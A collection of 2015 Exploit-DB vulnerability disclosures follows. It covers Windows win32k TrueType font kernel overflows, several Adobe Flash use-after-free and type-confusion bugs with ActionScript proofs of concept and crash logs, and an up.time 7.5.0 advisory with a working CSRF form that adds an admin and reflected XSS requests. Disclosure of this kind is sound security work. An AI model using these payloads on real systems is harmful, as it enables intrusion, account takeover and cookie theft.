LAST_CONTROL_TRANSFER: from 91f4bc79 to 91f4a4f1
STACK_TEXT:
8adcf3b8 91f4bc79 00000001 91f517d3 00000000 win32k!itrp_IUP+0x2fb
8adcf3c0 91f517d3 00000000 ff64eb28 00b61838 win32k!itrp_InnerExecute+0x38
8adcf3f8 91f4bc79 ff64eb28 91f4f088 ff64ebbc win32k!itrp_CALL+0x23b
8adcf400 91f4f088 ff64ebbc ff64eb84 ff64f95c win32k!itrp_InnerExecute+0x38
8adcf480 91f53234 00b61804 00b61838 ff64eb28 win32k!itrp_Execute+0x2b2
8adcf4a8 91f529dc 00b61804 00b61838 ff64eb28 win32k!itrp_ExecuteGlyphPgm+0x4a
8adcf4dc 91f51e5e ff64a570 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x102
8adcf574 91f5238c ff64a250 ff64b73c ff64eb28 win32k!fsg_ExecuteGlyph+0x1ce
8adcf5d0 91f52202 ff64a250 ff64eb28 ff64b6b4 win32k!fsg_CreateGlyphData+0xea
8adcf610 91f4f419 ff64a250 ff64eb28 ff64a2c4 win32k!fsg_GridFit+0x4d
8adcf688 91f5906c 00000001 8adcf6a4 91f58fc3 win32k!fs__Contour+0x287
8adcf694 91f58fc3 ff64a010 ff64a07c 8adcf6c0 win32k!fs_ContourGridFit+0x12
8adcf6a4 91f5991f ff64a010 ff64a07c 00000027 win32k!fs_NewContourGridFit+0x10
8adcf6c0 91f59960 fb8b0e78 00000027 8adcf6fc win32k!bGetGlyphOutline+0xd7
8adcf6e8 91f59b59 fb8b0e78 00000027 00000001 win32k!bGetGlyphMetrics+0x20
8adcf82c 91f4ec63 fb8b0e78 00000027 8adcf918 win32k!lGetGlyphBitmap+0x2b
8adcf850 91f4eab6 00000000 00000001 00000027 win32k!ttfdQueryFontData+0x158
8adcf8a0 91f4dce2 ff7af010 fba32cf0 00000001 win32k!ttfdSemQueryFontData+0x45
8adcf8e8 91f53774 ff7af010 fba32cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
8adcf960 91fcbc8d 8adcfc3c fb87ec00 ff6470cc win32k!xInsertMetricsPlusRFONTOBJ+0x120
8adcf990 91f4594d 0000000a ff7bf000 8adcfcd0 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
8adcf9c8 91fcb78b 8adcfc1c 8adcfc3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
8adcfa0c 91f455d0 8adcfcd0 0000000a 8adcfc1c win32k!ESTROBJ::vInit+0x268
8adcfc2c 91f45793 00000000 8adcfcd0 fba32cf0 win32k!GreGetTextExtentExW+0x12a
8adcfd0c 82657896 0801016f 02d90bac 0000000a win32k!NtGdiGetTextExtentExW+0x141
8adcfd0c 77b370f4 0801016f 02d90bac 0000000a nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0021f6c4 00000000 00000000 00000000 00000000 0x77b370f4
---
Depending on the malformed font file, the crashes occur at various locations in the win32k!itrp_IUP function, such as:
win32k!itrp_IUP+141: test [esi+edx], cl
win32k!itrp_IUP+173: test [eax+edx], cl
win32k!itrp_IUP+17b: mov eax, [ecx+ebx*4]
win32k!itrp_IUP+184: mov ecx, [ecx]
win32k!itrp_IUP+213: mov eax, [ebx]
win32k!itrp_IUP+2c9: mov eax, [eax+esi*4]
win32k!itrp_IUP+2fb: mov [edx+esi*4], eax
win32k!itrp_IUP+317: add [eax+esi*4], edx
This is caused by the fact that the function operates (reads from and writes to) on memory well beyond of the dynamically allocated buffers, leading to a pool-based buffer overflow of controlled size and content, consequently allowing for remote code execution in the context of the Windows kernel.
It appears that the culprit of the vulnerability is the lack of handling of a corner case explicitly mentioned in the "The TrueType Instruction Set, Part 2" specification [1]:
"This instruction operates on points in the glyph zone pointed to by zp2. This zone should almost always be zone 1. Applying IUP to zone 0 is an error."
Every testcase we have examined contains an SZP2[] instruction ("Set Zone Pointer 2") with a 0 argument followed by the IUP[] instruction later on in the TTF program. The faulty instruction stream has the same outcome regardless of its location (i.e. font pre-program, glyph program etc.).
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in the form of a crash in win32k!itrp_IUP or another location in kernel space, as caused by the corrupted pool state, depending on the specific testcase used.
Attached is an archive with eight sample files, each crashing at a different location in the win32k!itrp_IUP function on Windows 7 32-bit, together with corresponding kernel crash logs.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37919.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=370&can=1
We have encountered a number of Windows kernel crashes in the win32k!scl_ApplyTranslation function while processing corrupted TTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff6c7000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 94860935, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
[...]
FAULTING_IP:
win32k!scl_ApplyTranslation+9b
94860935 011487 add dword ptr [edi+eax*4],edx
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 94862292 to 94860935
STACK_TEXT:
8ad915ec 94862292 00000001 00000000 00000000 win32k!scl_ApplyTranslation+0x9b
8ad91610 9485f419 ff6ae250 ff6b24d8 ff6ae2c4 win32k!fsg_GridFit+0xdd
8ad91688 9486906c 00000001 8ad916a4 94868fc3 win32k!fs__Contour+0x287
8ad91694 94868fc3 ff6ae010 ff6ae07c 8ad916c0 win32k!fs_ContourGridFit+0x12
8ad916a4 9486991f ff6ae010 ff6ae07c 000000a4 win32k!fs_NewContourGridFit+0x10
8ad916c0 94869960 fc380e78 000000a4 8ad916fc win32k!bGetGlyphOutline+0xd7
8ad916e8 94869b59 fc380e78 000000a4 00000001 win32k!bGetGlyphMetrics+0x20
8ad9182c 9485ec63 fc380e78 000000a4 8ad91918 win32k!lGetGlyphBitmap+0x2b
8ad91850 9485eab6 00000000 00000001 000000a4 win32k!ttfdQueryFontData+0x158
8ad918a0 9485dce2 ff7af010 fbb4acf0 00000001 win32k!ttfdSemQueryFontData+0x45
8ad918e8 94863774 ff7af010 fbb4acf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
8ad91960 948dbc8d 8ad91c3c fba6cd68 ff6deca8 win32k!xInsertMetricsPlusRFONTOBJ+0x120
8ad91990 9485594d 0000000a ff7bf090 8ad91ce2 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
8ad919c8 948db78b 8ad91c1c 8ad91c3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
8ad91a0c 948555d0 8ad91cd0 0000000a 8ad91c1c win32k!ESTROBJ::vInit+0x268
8ad91c2c 94855793 00000000 8ad91cd0 fbb4acf0 win32k!GreGetTextExtentExW+0x12a
8ad91d0c 82645896 03010292 007c0bac 0000000a win32k!NtGdiGetTextExtentExW+0x141
8ad91d0c 772470f4 03010292 007c0bac 0000000a nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0021f9ac 00000000 00000000 00000000 00000000 0x772470f4
---
Depending on the malformed font file, the crashes are triggered at various locations in the win32k!scl_ApplyTranslation function:
win32k!scl_ApplyTranslation+43
win32k!scl_ApplyTranslation+9b
The crashes always occur while trying to access memory outside of a dynamically allocated destination buffer, leading to a pool-based buffer overflow, potentially allowing for remote code execution in the context of the Windows kernel. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "maxp" and "hmtx" tables.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in win32k!scl_ApplyTranslation or another location in kernel space, as caused by the corrupted pool state, depending on the specific testcase used. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with three proof of concept font files together with corresponding kernel crash logs.
---------------------------------------------------------------------------------------------------------------------------------------------
While performing further analysis of some of the offending samples, we have found that sometimes buffers and structures in the pools align such that this condition causes an overwrite of function pointers residing in the font's fnt_GlobalGraphicStateType structure, consequently leading to crashes at invalid EIPs when one of these pointers is subsequently called. Several crashes such as the one shown below have been reproduced on Windows 7 32-bit with Special Pools enabled for win32k.sys:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: c1c00dc1, memory referenced.
Arg2: 00000008, value 0 = read operation, 1 = write operation.
Arg3: c1c00dc1, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000002, (reserved)
[...]
FAULTING_IP:
+0
c1c00dc1 ?? ???
MM_INTERNAL_CODE: 2
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 9224a9cc to c1c00dc1
STACK_TEXT:
WARNING: Frame IP not in any known module. Following frames may be wrong.
994574b4 9224a9cc 99457504 fb5a2efc fb5a2e94 0xc1c00dc1
994574c8 92244483 00000000 00000001 00000001 win32k!scl_CalcComponentOffset+0x21
99457538 92261ef8 00000800 fb5a2e94 fb5a2e94 win32k!fsg_MergeGlyphData+0x12a
99457574 9226238c fb5a2250 fb5a2f1c fb5a348c win32k!fsg_ExecuteGlyph+0x268
994575d0 92262202 fb5a2250 fb5a348c fb5a2ddc win32k!fsg_CreateGlyphData+0xea
99457610 9225f419 fb5a2250 fb5a348c fb5a22c4 win32k!fsg_GridFit+0x4d
99457688 9226906c 00000000 994576a4 92268fc3 win32k!fs__Contour+0x287
99457694 92268fc3 fb5a2010 fb5a207c 994576c0 win32k!fs_ContourGridFit+0x12
994576a4 9226991f fb5a2010 fb5a207c 00000080 win32k!fs_NewContourGridFit+0x10
994576c0 92269960 fbc5ee78 00000080 994576fc win32k!bGetGlyphOutline+0xd7
994576e8 92269b59 fbc5ee78 00000080 00000001 win32k!bGetGlyphMetrics+0x20
9945782c 9225ec63 fbc5ee78 00000080 99457918 win32k!lGetGlyphBitmap+0x2b
99457850 9225eab6 00000000 00000001 00000080 win32k!ttfdQueryFontData+0x158
994578a0 9225dce2 ff7af010 fe37ecf0 00000001 win32k!ttfdSemQueryFontData+0x45
994578e8 92263774 ff7af010 fe37ecf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
99457960 922dbc8d 99457c3c fbc2ebd8 ff6687fc win32k!xInsertMetricsPlusRFONTOBJ+0x120
99457990 9225594d 00000008 ff7bf040 99457cd8 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
994579c8 922db78b 99457c1c 99457c3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
99457a0c 922555d0 99457cd0 00000008 99457c1c win32k!ESTROBJ::vInit+0x268
99457c2c 92255793 00000000 99457cd0 fe37ecf0 win32k!GreGetTextExtentExW+0x12a
99457d0c 82646896 060102a1 00150bb0 00000008 win32k!NtGdiGetTextExtentExW+0x141
99457d0c 77a070f4 060102a1 00150bb0 00000008 nt!KiSystemServicePostCall
0028f27c 00000000 00000000 00000000 00000000 0x77a070f4
---
I am attaching another archive with further 3 samples triggering crashes at invalid EIPs (as called by win32k!scl_CalcComponentOffset) on my test environment, together with corresponding crash logs.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37918.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=425&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
To reproduce, host the attached files appropriately and:
http://localhost/LoadMP4.swf?file=crash4000368.flv
If there is no crash at first, refresh the page a few times.
With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:
=> 0x00007f7789d081bb <__memmove_ssse3_back+443>: movaps %xmm1,-0x10(%rdi)
rdi 0x7f7778d69200
7f777894b000-7f7778d69000 rw-p 00000000 00:00 0
7f7778d69000-7f7778d88000 ---p 00000000 00:00 0
This looks very like a heap-based buffer overflow that just happens to have walked off the end of the committed heap.
Also, this bug bears disturbing similarities to CVE-2015-3043, see for example: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37879.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=404&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
Source file and compiled PoC attached.
Looking at https://github.com/adobe-flash/avmplus/blob/master/core/XMLListObject.cpp:
bool XMLListObject::delUintProperty(uint32_t index)
...
if (index >= _length()) [1]
{
return true;
}
...
px->childChanges(core->knodeRemoved, r->atom()); [2]
...
m_children.removeAt(index); [3]
In [1], the passed in index is validated. In [2], the callback can run actionscript, which might shrink the size of the current XMLList. In [3], the pre-validated index is used but it might now be invalid due to shrinking at [2]. Unfortunately, removeAt() does not behave well in the presence of an out-of-bounds index.
The PoC works by triggering a wild copy in order to demonstrate the crash. But other side-effects are possible such as decrementing the refcount of an out-of-bounds index.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37872.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=408&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a use-after-free in CreateTextField. If a flash file contains a MovieClip heirarcy, such as:
_root-->l1-->l2-->l3
If createTextField is called on l2 to create l3, and the call makes a call into a function the deletes l2 or l1, a use-after-free occurs. A POC is as follows:
var l1 = this.createEmptyMovieClip("l1", 1);
var l2 = l1.createEmptyMovieClip("l2", 1);
ns = {toString: strfunc, valueOf: strfunc};
var l3 = l2.createTextField(ns, 1, 0, 0, 10, 10);
function strfunc(){
l2.removeMovieClip();
return "myname";
}
A sample SWF and fla are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37873.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=409&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a type confusion issue in TextRenderer.setAdvancedAntialiasingTable. If the font, insideCutoff or outsideCutoff are set to objects that are not integers, they are still assumed to be integers. A proof-of-concept is below:
var antiAliasEntry_1 = {fontSize:10, insideCutoff:1.61, outsideCutoff:-3.43};
var antiAliasEntry_2 = {fontSize:"", insideCutoff:0.8, outsideCutoff:-0.8};
var arialTable:Array = new Array(antiAliasEntry_1, antiAliasEntry_2);
TextRenderer.setAdvancedAntialiasingTable("Arial", "none", "dark", arialTable);
This issue is low-impact because the type-confused objects are read into the font and cutoff values, which cannot be directly retreived from script. It is probably possible to determine the value read by doing hit tests on the text that is rendered (to see how big and clipped it is), but this would be fairly difficult.
A sample SWF and fla are attached, these samples intentionally crash to demonstrate the issue.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37874.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=416&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
This issue is a variant of issue 192 , which the fix did not address.
If XMLSocket connect is called on an object that already has a destroy function set, such as a BitmapData object, the method will set the user data of that object, but not clear the destroy function. This leads to type confusion when the user data is freed during garbage collection.
A PoC is as follows:
class subsocket extends flash.display.BitmapData{
public function subsocket(){
var n = {valueOf : func};
this.valueOf = func;
var x = new XMLSocket();
x.connect.call(this, "127.0.0.1", this);
}
function func(){
if(this){
}
this.__proto__ = {};
this.__proto__.__constructor__ = flash.display.BitmapData;
super(10, 10, true, 10);
return 80;
}
}
A SWF and fla are attached. Note that this PoC needs to be run on a webserver on localhost (or change the IP in the PoC to the server value), and it only crashes in Chrome on 64-bit Linux.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37876.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=410&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The following crash was observed in Flash Player 17.0.0.188 on Windows:
(81c.854): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37397006 ebx=00000000 ecx=008c0493 edx=09f390d0 esi=08c24d98 edi=09dc2000
eip=07a218cb esp=015eda80 ebp=015edb24 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050216
Flash32_17_0_0_188+0x18cb:
07a218cb ff6004 jmp dword ptr [eax+0x4] ds:0023:3739700a=????????
- The test case reproduces on Windows 7 using IE11. It does not appear to immediately reproduce on Windows+Chrome or Linux+Chrome.
- The crash can also reproduce on one of the two mov instructions prior to the jmp shown here.
- The crash appears to occur due to a use-after-free related to loading a sub-resource from a URL.
- The test case minimizes to an 11-bit difference from the original sample file.
- The following test cases are attached: 2038518113_crash.swf (crashing file), 2038518113_min.swf (minimized file), 2038518113_orig.swf (original non-crashing file).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37875.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=418&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a use-after-free in the TextField gridFitType setter. A PoC is below:
var test = this.createTextField("test", 1, 0, 0, 100, 100);
var n = {toString : func, valueOf : func};
test.gridFitType = n;
function func(){
test.removeTextField();
for(var i = 0; i < 1000; i++){
var b = new flash.display.BitmapData(1000, 1000, true, 10);
}
trace("here");
return "natalie";
}
A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition, additional SWFs are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37877.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=422&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a type confusion issue in the TextFormat constructor that is reachable because the FileReference constructor does not verify that the incoming object is of type Object (it only checks that the object is not native backed). The TextFormat constructor first sets a new object to type TextFormat, and then calls into script several times before setting the native backing object. If one of these script calls then calls into the FileReference constructor, the object can be set to type FileReference, and then the native object will be set to the TextFormat, leading to type confusion. A PoC is as follows:
In the main SWF:
var a = new subfr();
var allTypes:Array = new Array();
var imageTypes:Object = new Object();
imageTypes.description = "Images (*.jpg, *.jpeg, *.gif, *.png)";
imageTypes.extension = "*.jpg; *.jpeg; *.gif; *.png";
allTypes.push(imageTypes);
var textTypes:Object = new Object();
textTypes.description = "Text Files (*.txt, *.rtf)";
textTypes.extension = "*.txt;*.rtf";
allTypes.push(textTypes);
var f = new flash.net.FileReference();
f.cancel.call(a);
Defining subfr:
class subfr extends Object{
public function subfr(){
var n = {valueOf : func};
this.valueOf = func;
this.toString = func;
this.__proto__ = {};
this.__proto__.__constructor__ = TextFormat;
super(this);
}
function func(){
this.__proto__ = {};
this.__proto__.__constructor__ = flash.net.FileReference;
super();
return "natalie";
}
}
A sample SWF and fla are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37878.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=444&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for https://code.google.com/p/chromium/issues/detail?id=498984]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
This is Issue 457278 resurrected. Again.
VERSION
Chrome Version: [43.0.2357.124, Flash 18.0.0.160]
Operating System: [Windows 7 x64 SP1]
REPRODUCTION CASE
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
This is Issue 457278 resurrected. Again.
When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs.
Flash 17.0.0.169 added a flag to mitigate Issue 457278
.text:004D6F0B mov esi, [esp+2Ch+var_C]
.text:004D6F0F push 1 ; char
.text:004D6F11 mov ecx, edi ; int
.text:004D6F13 mov byte ptr [esi+0Ch], 1 ; this flag was added
.text:004D6F17 call xparseAS2Code
.text:004D6F1C mov byte ptr [esi+0Ch], 0
Flash 18.0.0.160 added an other flag to mitigate Issue 476926
.text:004D6E3E loc_4D6E3E:
.text:004D6E3E cmp byte ptr [ebp+0Ch], 0 ; this flag was added
.text:004D6E42 lea eax, [ebp+0Ch]
.text:004D6E45 mov [esp+2Ch+var_8], eax
.text:004D6E49 jz short loc_4D6E58
.text:004D6E4B mov ecx, dword_E50A40
.text:004D6E51 call sub_967730
.text:004D6E58
.text:004D6E58 loc_4D6E58:
.text:004D6E58 mov byte ptr [eax], 1
.text:004D6E5B jmp short loc_4D6E65
But they didn't figure it was possible to execute AS2 code a bit above in the function:
.text:004D6E6F mov eax, [ebp+0]
.text:004D6E72 push 0
.text:004D6E74 lea edx, [esp+34h+var_14]
.text:004D6E78 push edx
.text:004D6E79 mov edx, [eax+14h]
.text:004D6E7C mov ecx, ebp
.text:004D6E7E call edx ; return the filter name
.text:004D6E80 push eax
.text:004D6E81 lea eax, [esp+3Ch+var_10]
.text:004D6E85 push eax
.text:004D6E86 mov ecx, edi
.text:004D6E88 call xcreateStringObject
.text:004D6E8D mov ebx, [esp+38h+arg_4]
.text:004D6E91 push eax
.text:004D6E92 push ecx
.text:004D6E93 mov eax, esp
.text:004D6E95 mov ecx, edi
.text:004D6E97 mov [eax], ebx
.text:004D6E99 call sub_420400 ; execute some AS2 with a custom __proto__ object
For ex:
var oob = {}
oob.__proto__ = {}
oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {});
flash.filters = oob
Tested on Flash Player standalone 18.0.0.160, and Chrome 43.0.2357.124.
That should crash while dereferencing 0x41424344.
Compile with Flash CS 5.5.
***************************************************************************
Content of FiltusPafusTer.fla
import flash.filters.GlowFilter;
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x50/4;i++) {
a2[i] = 0x41424344
}
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x200;i++) {
a1[i].tabStops = a2
}
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]
function f() {
for (var i = 0; i<0x20;i++) {
_global.a1[0x100+i*4].tabStops = [1,2,3,4]
}
_global.tfield.filters = []
for (var i = 0; i<0x200;i++) {
_global.a1[i].tabStops = a2
}
}
_global.tfield = tfield
_global.a1 = a1
_global.a2 = a2
var oob = {}
oob.__proto__ = {}
oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {});
flash.filters = oob
var a = tfield.filters
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37883.zip
up.time 7.5.0 XSS And CSRF Add Admin Exploit
Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
Summary: The next-generation of IT monitoring software.
Desc: The application allows users to perform certain
actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges
if a logged-in user visits a malicious web site. Multiple
cross-site scripting vulnerabilities were also discovered.
The issue is triggered when input passed via the multiple
parameters is not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of
an affected site.
Tested on: Jetty, PHP/5.4.34, MySQL
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5252
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5252.php
29.07.2015
--
CSRF Add Admin:
---------------
<html>
<body>
<form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=add&id=0" method="POST">
<input type="hidden" name="operation" value="submit" />
<input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
<input type="hidden" name="username" value="Testingus4" />
<input type="hidden" name="password" value="123123" />
<input type="hidden" name="passwordConfirm" value="123123" />
<input type="hidden" name="firstname" value="Test" />
<input type="hidden" name="lastname" value="Ingus" />
<input type="hidden" name="location" value="Neverland" />
<input type="hidden" name="emailaddress" value="test4@test.test" />
<input type="hidden" name="emailtimeperiodid" value="1" />
<input type="hidden" name="phonenumber" value="111111" />
<input type="hidden" name="phonenumbertimeperiodid" value="1" />
<input type="hidden" name="windowshost" value="test" />
<input type="hidden" name="windowsworkgroup" value="testgroup" />
<input type="hidden" name="windowspopuptimeperiodid" value="1" />
<input type="hidden" name="landingpage" value="MyPortal" />
<input type="hidden" name="isonvacation" value="0" />
<input type="hidden" name="receivealerts" value="on" />
<input type="hidden" name="receivealerts" value="1" />
<input type="hidden" name="alertoncritical" value="on" />
<input type="hidden" name="alertoncritical" value="1" />
<input type="hidden" name="alertonwarning" value="on" />
<input type="hidden" name="alertonwarning" value="1" />
<input type="hidden" name="alertonunknown" value="on" />
<input type="hidden" name="alertonunknown" value="1" />
<input type="hidden" name="alertonrecovery" value="on" />
<input type="hidden" name="alertonrecovery" value="1" />
<input type="hidden" name="activexgraphs" value="0" />
<input type="hidden" name="newuser" value="on" />
<input type="hidden" name="newuser" value="1" />
<input type="hidden" name="userroleid" value="2" />
<input type="hidden" name="usergroupid[]" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reflected XSS:
--------------
GET /main.php?section=UserContainer&subsection=edit&id=bc6ac%22%3E%3Cimg%20src%3da%20onerror%3dalert%28document.cookie%29;%3E&name=Testingus4 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1a416c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea233bd169b0 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=14f2e6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46cfd43d432&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit&id=bc6ac"><img%20src%3da%20onload%3dalert(1)>f2c23&name=Testingus4 HTTP/1.1
-
GET /main.php?page=Users&subPage=UserContainer&subsection=view&id=240689'%3balert(1)%2f%2f205 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit&id=6&name=Testingus4e8b7f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eadfb7 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit7bef8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9095&id=6&name=Testingus4 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add270d4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c1acb1f950&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28a3345"><img%20src%3da%20onload%3dalert(1)>2d6845d9556&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
